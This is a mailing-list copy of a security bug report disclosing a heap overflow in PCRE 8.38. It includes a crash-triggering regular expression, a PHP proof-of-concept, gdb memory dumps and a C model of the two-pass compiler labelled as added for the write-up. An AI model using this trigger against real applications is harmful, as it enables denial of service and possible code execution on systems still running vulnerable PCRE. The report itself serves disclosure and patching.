[pcre-dev] [Bug 1767] New: PCRE Library Heap Overflow Vulner…

Author: admin
Date:  
To: pcre-dev
Subject: [pcre-dev] [Bug 1767] New: PCRE Library Heap Overflow Vulnerability
https://bugs.exim.org/show_bug.cgi?id=1767

            Bug ID: 1767
           Summary: PCRE Library Heap Overflow Vulnerability
           Product: PCRE
           Version: 8.38
          Hardware: All
                OS: All
            Status: NEW
          Severity: security
          Priority: medium
         Component: Code
          Assignee: ph10@???
          Reporter: rubymail@???
                CC: pcre-dev@???


Created attachment 856
--> https://bugs.exim.org/attachment.cgi?id=856&action=edit
regular expression to trigger the crash of pcretest

I. Summary
PCRE is a regular expression C library inspired by the regular expression
capabilities of the Perl programming language. The PCRE library is incorporated
into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP and
KDE/Konqueror.
The PCRE library is prone to a heap overflow vulnerability. During the
compilation of a malformed regular expression, more data is written into the
malloc'ed block than the size computed by compile_regex. Exploits using
advanced heap feng shui techniques may allow an attacker to execute arbitrary
code in the context of the user running the affected application.
------------------------------------------------------------------
II. Description
The latest version of PCRE is prone to a heap overflow vulnerability that is
triggered by the following regular expression.

/((?:F?+(?:^(?(R)a+\"){99}-))(?J)(?'R'(?'R'<((?'RR'(?'R'\){97)?J)?J)(?'R'(?'R'\){99|(:(?|(?'R')(\k'R')|((?'R')))H'R'R)(H'R))))))/

To reproduce the problem, we can use the pcretest tool provided with the PCRE
library, or an application that wraps PCRE, such as PHP.
For PHP, the latest version, PHP 7.0.0 (bundling PCRE 8.38), can be made to
trigger the bug with the following code snippet:

<?php
// The overflow happens while the pattern is compiled, so the subject
// string is irrelevant; the crash occurs before any matching is done.
preg_match("/((?:F?+(?:^(?(R)a+\"){99}-))(?J)(?'R'(?'R'<((?'RR'(?'R'\){97)?J)?J)(?'R'(?'R'\){99|(:(?|(?'R')(\k'R')|((?'R')))H'R'R)(H'R))))))/", "WenGuanxing");
?>

First, pcre_compile2 invokes compile_regex() to calculate the amount of memory
needed to store the compiled regular expression.
re then points to a newly allocated block of that size.
Next, pcre_compile2 invokes compile_regex() again to write the compiled regular
expression into the allocated block.
The problem is that more data is written than the first pass predicted.
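To make the two-pass scheme concrete, here is a small C model added for this write-up (it is not PCRE's code): the emitter only counts during the first pass and refuses to write past the pass-1 size during the second, so a measuring/fill mismatch of the kind reported here is detected instead of corrupting the heap. The `drift` parameter is a constructed knob that models an under-counting first pass.

```c
/* Added example, not PCRE code: a model of the "measure, allocate, fill"
 * scheme in which the fill pass is bounded by the size from the measuring
 * pass, so a mismatch is detected rather than written past the block. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    uint8_t *base;     /* NULL during the measuring pass */
    size_t   cap;      /* allocation size fixed by the measuring pass */
    size_t   len;      /* bytes counted (pass 1) or written (pass 2) */
    int      overflow; /* set if pass 2 tried to exceed cap */
} emitter;

static void emit(emitter *e, const void *p, size_t n) {
    if (e->base == NULL) { e->len += n; return; }          /* pass 1: count */
    if (n > e->cap - e->len) { e->overflow = 1; return; }  /* pass 2: refuse */
    memcpy(e->base + e->len, p, n);
    e->len += n;
}

/* Toy compiler: one byte per pattern character plus a 2-byte terminator.
 * `drift` is a constructed knob: the fill pass emits that many bytes the
 * measuring pass never counted, modelling the under-sizing in this report. */
static void compile_pass(emitter *e, const char *pat, size_t drift) {
    static const uint8_t end[2] = { 0xff, 0x00 };
    for (const char *c = pat; *c; c++) emit(e, c, 1);
    emit(e, end, sizeof end);
    if (e->base != NULL) {
        const uint8_t pad = 0xaa;
        for (size_t i = 0; i < drift; i++) emit(e, &pad, 1);
    }
}

/* Returns the measured size on success, or 0 if the fill pass overran. */
static size_t two_pass_compile(const char *pat, size_t drift) {
    emitter e = { NULL, 0, 0, 0 };
    compile_pass(&e, pat, drift);               /* pass 1: measure */
    size_t size = e.len;
    uint8_t *block = malloc(size);
    if (block == NULL) return 0;
    e.base = block; e.cap = size; e.len = 0;
    compile_pass(&e, pat, drift);               /* pass 2: fill, bounded */
    free(block);
    return e.overflow ? 0 : size;
}
```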

The following test was carried out on Ubuntu 15.10 x64 with PHP 7.0.0:
==============================================================
gdb php 
(gdb) r poc.php
9332    re = (REAL_PCRE *)(PUBL(malloc))(size);
(gdb) x/2i $rip-3
   0x5aa95a <php_pcre_compile2+7706>:   mov    rdi,rbx
=> 0x5aa95d <php_pcre_compile2+7709>:   call   QWORD PTR [r12]
(gdb) info registers rdi
rdi            0x710
(gdb) ni
(gdb) x/16b $rax
0x209c870:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x209c878:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
==============================================================


So the expected size of the compiled regular expression above is 0x710 = 1808
bytes, and the base address of the allocated block is 0x209c870.
Here is the memory around 0x209c870 + 0x710 (the end of the allocation) before
the second compile_regex call:

==============================================================
(gdb) x/32b (0x209c870+0x710-0x10)
0x209cf70:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x209cf78:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00]
0x209cf80:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x209cf88:      0x81    0xe0    0x00    0x00    0x00    0x00    0x00    0x00
==============================================================


After the second compile_regex call:

==============================================================
(gdb) x/32b (0x209c870+0x710-0x10)
0x209cf70:      0x78    0x00    0x7a    0x78    0x00    0xaa    0x78    0x00
0x209cf78:      0xb0    0x78    0x00    0xb8    0x78    0x00    0xbe    0x78]
0x209cf80:     *0x06   *0xa4   *0x78   *0x06   *0xaa    0x00    0x00    0x00
0x209cf88:      0x81    0xe0    0x00    0x00    0x00    0x00    0x00    0x00
==============================================================


Five bytes are written past the end of the allocation in this case.
This overflow can be used to modify the length field of an adjacent
array/vector/string, giving the attacker the ability to read and write memory
in the context of the affected application.
------------------------------------------------------------------
III. Impact
Heap Overflow
------------------------------------------------------------------
IV. Affected
PCRE version 8.38 is confirmed to be vulnerable.
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.
